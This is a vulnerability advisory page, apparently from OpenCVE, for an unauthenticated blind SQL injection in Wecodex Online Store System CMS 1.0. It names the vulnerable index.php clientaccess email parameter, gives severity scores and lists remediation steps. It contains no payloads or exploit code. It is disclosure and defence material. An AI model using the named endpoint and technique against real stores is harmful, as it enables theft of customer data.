Description
Online Store System CMS 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the email parameter. Attackers can send POST requests to index.php with the action=clientaccess parameter using boolean-based blind or time-based blind SQL injection payloads in the email field to extract sensitive database information.
Published: 2026-03-26
Score: 8.8 High
EPSS: < 1% Very Low
KEV: No
Impact: Information Disclosure
Action: Immediate Patch
AI Analysis

Impact

A flaw in the Online Store System CMS allows attackers without authentication to inject SQL code through the email parameter of the clientaccess endpoint. By sending crafted POST requests to index.php with the action=clientaccess parameter, an attacker can perform Boolean‑based or time‑based blind SQL injection, enabling extraction of sensitive database information. The vulnerability does not rely on user privileges and can be exploited from any external host capable of communicating with the web server.

Affected Systems

The vulnerability affects the Online Store System CMS 1.0 developed by Wecodex. The exposed code is the index.php script handling clientaccess requests via the email field. No other product versions are specified as impacted.

Risk and Exploitability

The CVSS score of 8.8 reflects a high severity potential for information disclosure. The EPSS score is below 1%, suggesting that zero‑day exploitation is currently unlikely, and the vulnerability is not listed in the CISA KEV catalog. Attackers need only the ability to send a crafted HTTP POST request to the vulnerable endpoint over the network; no additional privileges or internal access are required.

Generated by OpenCVE AI on March 26, 2026 at 14:09 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Contact Wecodex to obtain an updated version of Online Store System CMS that removes the SQL injection flaw or apply a vendor‑supplied patch if available.
  • If no patch is available, restrict external access to the index.php script or the clientaccess action, for example by implementing IP whitelisting or firewall rules.
  • Apply input validation or use parameterized queries for the email parameter to prevent SQL injection.
  • Set up logging and monitoring for failed or suspicious POST requests to index.php to detect attempted exploitation attempts.

Generated by OpenCVE AI on March 26, 2026 at 14:09 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Fri, 27 Mar 2026 08:45:00 +0000

Type Values Removed Values Added
First Time appeared Wecodex
Wecodex online Store System Cms
Vendors & Products Wecodex
Wecodex online Store System Cms

Thu, 26 Mar 2026 15:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Thu, 26 Mar 2026 12:00:00 +0000

Type Values Removed Values Added
Description Online Store System CMS 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the email parameter. Attackers can send POST requests to index.php with the action=clientaccess parameter using boolean-based blind or time-based blind SQL injection payloads in the email field to extract sensitive database information.
Title Online Store System CMS 1.0 SQL Injection via clientaccess
Weaknesses CWE-89
References
Metrics cvssV3_1

{'score': 8.2, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N'}

cvssV4_0

{'score': 8.8, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N'}

Subscriptions

Wecodex Online Store System Cms
cve-icon MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-03-26T15:02:07.192Z

Reserved: 2026-03-26T11:33:01.646Z

Link: CVE-2018-25203

cve-icon Vulnrichment

Updated: 2026-03-26T13:44:43.611Z

cve-icon NVD

Status : Awaiting Analysis

Published: 2026-03-26T12:16:05.047

Modified: 2026-03-26T15:13:15.790

Link: CVE-2018-25203

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-03-27T09:28:43Z

Weaknesses